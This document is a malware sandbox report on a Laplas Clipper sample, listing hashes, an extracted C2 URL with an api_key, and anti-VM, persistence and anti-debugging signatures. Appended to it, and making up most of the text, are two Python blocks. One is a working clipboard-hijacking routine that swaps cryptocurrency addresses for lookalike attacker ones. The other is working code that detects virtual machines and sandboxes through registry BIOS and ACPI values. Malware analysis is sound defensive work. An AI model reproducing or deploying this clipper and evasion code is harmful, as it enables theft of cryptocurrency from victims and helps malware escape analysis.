General

  • Target

    4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

  • Size

    4.6MB

  • Sample

    230720-d6cxtsda8z

  • MD5

    44e4af2a42e0709726bc55c48755b6c6

  • SHA1

    f30667ab145f876ed67f3568771c9f44cbb075c8

  • SHA256

    4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

  • SHA512

    ce98088c7ef0c6ba4e0d0acade13eca5d7dfbfea572c805bc28b26c5cb86889b0d19fdd0e194dd80398c1a4734c201045d63b406bf102f9ff10b94bef8929844

  • SSDEEP

    98304:N5QHGBGgZ9TeexEgENstZK0ZqjFOrbKSNm0rkR2U1PZGP0AeZ3o20SlC4W6+EhAG:NO8DZ9TePgEwPZ+OHHrLU1xI0AeZ4ClR

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Targets

    • Target

      4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

    • Laplas Clipper

      Laplas is a clipboard hijacker ("clipper") that watches the clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled ones; three variants exist, written in Golang, C#, and C++.

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Checks BIOS information in registry

      BIOS vendor and version strings under HKLM\HARDWARE\DESCRIPTION\System are commonly read to detect sandbox and virtual machine environments.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Suspicious use of NtSetInformationThreadHideFromDebugger

      NtSetInformationThread with the ThreadHideFromDebugger information class stops the calling thread from delivering debug events to an attached debugger, a common anti-debugging technique.
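The clipboard-swap behaviour the Laplas Clipper signature describes, modelled as an added example (this is not the sample's code and not part of the report). The address regexes, the attacker address pool and the lookalike-selection rule are assumptions standing in for what the sample would obtain from its C2 with the api_key shown above; every address below is constructed and is not a real wallet.

```python
import re

# Address formats a clipper typically watches. The regexes are written for
# this example and are not Laplas' own matching rules.
ADDRESS_PATTERNS = {
    "btc-legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc-bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{25,62}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "trx": re.compile(r"\bT[a-km-zA-HJ-NP-Z1-9]{33}\b"),
}

# Constructed attacker-controlled addresses, one list per format. They stand in
# for the addresses the C2 would return; none of them is a real wallet.
ATTACKER_POOL = {
    "btc-legacy": [
        "1AttackerAddrAAAAAAAAAAAAAAAAAAAAA",
        "1BvAttackerAddrBBBBBBBBBBBBBBBBBB",
    ],
    "eth": [
        "0xab12" + "0" * 32 + "ab12",  # shares the victim's first/last characters
        "0x" + "ff" * 20,
    ],
}


def find_addresses(text):
    """Return every (format, address) pair found in a clipboard string."""
    hits = []
    for kind, pattern in ADDRESS_PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((kind, match.group(0)))
    return hits


def _common_prefix_len(a, b):
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def lookalike_score(victim, candidate):
    """Characters shared at the start plus at the end. Wallet UIs usually show
    only those, so a high score makes the swap hard to spot by eye."""
    return (_common_prefix_len(victim, candidate)
            + _common_prefix_len(victim[::-1], candidate[::-1]))


def pick_lookalike(kind, victim, pool=ATTACKER_POOL):
    """Choose the pool address of the same format that best resembles the victim's."""
    candidates = pool.get(kind, [])
    if not candidates:
        return None
    return max(candidates, key=lambda c: lookalike_score(victim, c))


def clip_swap(clipboard_text, pool=ATTACKER_POOL):
    """One pass of the clipper loop over the clipboard contents.
    Returns (rewritten_text, [(format, original, replacement), ...])."""
    new_text = clipboard_text
    swaps = []
    for kind, addr in find_addresses(clipboard_text):
        replacement = pick_lookalike(kind, addr, pool)
        if replacement and replacement != addr:
            new_text = new_text.replace(addr, replacement)
            swaps.append((kind, addr, replacement))
    return new_text, swaps


if __name__ == "__main__":
    victim = "0x" + "ab12cd34ef56" * 3 + "ab12"  # constructed, not a real wallet
    rewritten, swaps = clip_swap("send 0.5 ETH to " + victim + " thanks")
    for kind, before, after in swaps:
        print(f"{kind}: {before} -> {after}")
    print(rewritten)
```

The scoring rule is one simple model of the lookalike addresses Laplas panels are described as returning; the real selection happens server-side and is not visible in this report. For defenders the same regexes work as a hunt for address-shaped strings in clipboard or process-memory telemetry, and the only reliable user-side check is comparing the whole pasted address, because a lookalike is chosen precisely to match the characters a wallet UI displays.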

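The two registry checks flagged above (VirtualBox ACPI values and BIOS information), reconstructed as an added example that is not the sample's code. The registry paths are the real Windows locations; the marker list and the two sample value sets are assumptions constructed for the example, not values captured from this run. `read_live_registry` only does anything on Windows and is the one part that touches a real system.

```python
import sys

# Registry locations the two signatures refer to (real Windows paths).
BIOS_KEY = r"HARDWARE\DESCRIPTION\System"
BIOS_VALUES = ("SystemBiosVersion", "VideoBiosVersion", "SystemBiosDate")
ACPI_KEYS = (r"HARDWARE\ACPI\DSDT", r"HARDWARE\ACPI\FADT", r"HARDWARE\ACPI\RSDT")

# Firmware vendor strings that betray a hypervisor. "VBOX__" is the OEM ID in
# VirtualBox's ACPI tables and "VBOX"/"VIRTUALBOX" appear in its BIOS strings;
# "VRTUAL" is Hyper-V's ACPI OEM ID. List chosen for this example.
VM_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "VRTUAL")


def _as_strings(value):
    # REG_MULTI_SZ comes back from winreg as a list; normalise everything to one.
    return list(value) if isinstance(value, (list, tuple)) else [str(value)]


def scan_bios_values(bios):
    """bios: {value_name: str | [str]}. Returns ['SystemBiosVersion=VBOX   - 1', ...]."""
    hits = []
    for name, value in bios.items():
        for s in _as_strings(value):
            if any(marker in s.upper() for marker in VM_MARKERS):
                hits.append(f"{name}={s}")
    return hits


def scan_acpi_tables(acpi):
    """acpi: {key_path: [oem_id_subkey, ...]}. Returns full key paths that match."""
    hits = []
    for path, oem_ids in acpi.items():
        for oem in oem_ids:
            if any(marker in oem.upper() for marker in VM_MARKERS):
                hits.append(path + "\\" + oem)
    return hits


def vm_verdict(bios, acpi):
    """Combine both checks the sample performs: (looks_like_vm, evidence)."""
    evidence = scan_bios_values(bios) + scan_acpi_tables(acpi)
    return bool(evidence), evidence


def read_live_registry():
    """Collect the same values from a live Windows host; None elsewhere."""
    if sys.platform != "win32":
        return None
    import winreg  # Windows only
    bios, acpi = {}, {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, BIOS_KEY) as key:
        for name in BIOS_VALUES:
            try:
                bios[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass
    for path in ACPI_KEYS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                count = winreg.QueryInfoKey(key)[0]
                acpi[path] = [winreg.EnumKey(key, i) for i in range(count)]
        except FileNotFoundError:
            pass
    return bios, acpi


# Constructed samples: what a stock VirtualBox guest and a physical host might
# return. Illustrative values, not captured from the sandbox run.
VBOX_GUEST = (
    {"SystemBiosVersion": ["VBOX   - 1"],
     "VideoBiosVersion": ["Oracle VM VirtualBox Version 7.0.0 VBE BIOS"],
     "SystemBiosDate": "12/01/06"},
    {r"HARDWARE\ACPI\DSDT": ["VBOX__"], r"HARDWARE\ACPI\FADT": ["VBOX__"]},
)
PHYSICAL_HOST = (
    {"SystemBiosVersion": ["DELL   - 1072009", "1.21.0"],
     "VideoBiosVersion": ["Intel Video BIOS"],
     "SystemBiosDate": "03/15/21"},
    {r"HARDWARE\ACPI\DSDT": ["DELL  "], r"HARDWARE\ACPI\FADT": ["DELL  "]},
)

if __name__ == "__main__":
    for label, sample in (("vbox", VBOX_GUEST), ("physical", PHYSICAL_HOST)):
        print(label, vm_verdict(*sample))
    live = read_live_registry()
    if live:
        print("this host", vm_verdict(*live))
```

Hardened sandboxes rewrite exactly these strings, so the check produces false negatives against them while still firing on stock VirtualBox guests. On the monitoring side note that Sysmon records registry key creation, deletion and value writes but not reads, so the "Checks BIOS information in registry" signature comes from the sandbox hooking the query API, not from something an endpoint would log by default.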